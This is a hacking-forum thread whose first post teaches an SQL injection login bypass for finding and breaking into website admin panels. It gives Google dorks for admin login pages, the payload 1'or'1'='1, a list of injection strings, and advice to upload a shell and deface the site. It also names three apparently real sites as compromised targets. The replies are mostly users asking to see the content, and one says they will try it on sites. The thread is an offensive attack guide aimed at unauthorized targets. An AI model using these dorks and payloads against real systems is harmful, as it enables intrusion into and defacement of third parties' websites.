Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Basic SQL To Bypass Admin Panel
#1
You might have seen hackers hacking and defaceing websites, editing it with their own stuff, makeing post on websites etc. There are many methods of doing this, In this tutorial I will be showing you a very basic and simply SQLi (Structured Query Language Injection). I will show you how to find the websites admin panel using a simple google dork and a SQL query to bypass the admin user name and password and enter into the panel. When you are in the panel just find a upload option and upload your shell, then deface it.

[hide]
Dorks: inurl:adminlogin.aspx
inurl:admin/index.php
inurl:administrator.php
inurl:administrator.asp
inurl:login.asp
inurl:login.aspx
inurl:login.php
inurl:admin/index.php
inurl:adminlogin.aspx



# Try to make your own dorks also to get more success rate.


Hundreds of sites will open up having /adminlogin.aspx in their URL. Select any website, you will get the area from where the admins login. Fill the details as:
User: 1'or'1'='1
Password: 1'or'1'='1


Use the above mentioned login details and you will be into the admin panel of a website. I will not work for all the websites you will find, but will work on most of the website.


Some websites which I got:

http://gimtech.in/Webadmin/AdminLogin.aspx
http://welkinindiagroup.com/admin/adminlogin.aspx
http://nobinsolutions.com/Adminlogin.aspx





Other InjecTion Queries:
Code:
‘ or 1=1 –
1'or’1'=’1
admin’–
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’='x
” or “x”=”x
‘) or (‘x’='x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’='a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’='a
hi’) or (‘a’='a
hi”) or (“a”=”)
[/hide]
-Lies

убийство. #RIP Unsolidarity

Donations: 1Ebwae9KypteHuaZUe8rW9DpzAPY9rBKFV
Reply
#2
Simple, but effective. Some things are so obvious programmers seem to overlook them, and that's how sites got hacked. I remember one of my old scripts I made was a simple chatroom which used an authorization script from a phpBB forum, and when the admin removed the script, a logic flaw allowed you to log in as any username. He trolled my chatroom, and I ended up being friends with him. He referred the very first members that joined Cyber Forums.
Reply
#3
Posting to see this, I'd like to learn more about SQL. I'm going to check a few sites Big Grin
Reply
#4
I'd like to take a look. Thanks!
Reply
#5
o really ?? let's see
Reply
#6
I'll like to know more about this...
Reply
#7
I'd like to take a look at this!
Reply
#8
i want to see please
Reply
#9
thanks man . i hope it works !!! Smile
Reply
#10
Let's take a look thanks for this Wink
[Image: cyber3.png]
Reply


Forum Jump:


Users browsing this thread: 1 Guest(s)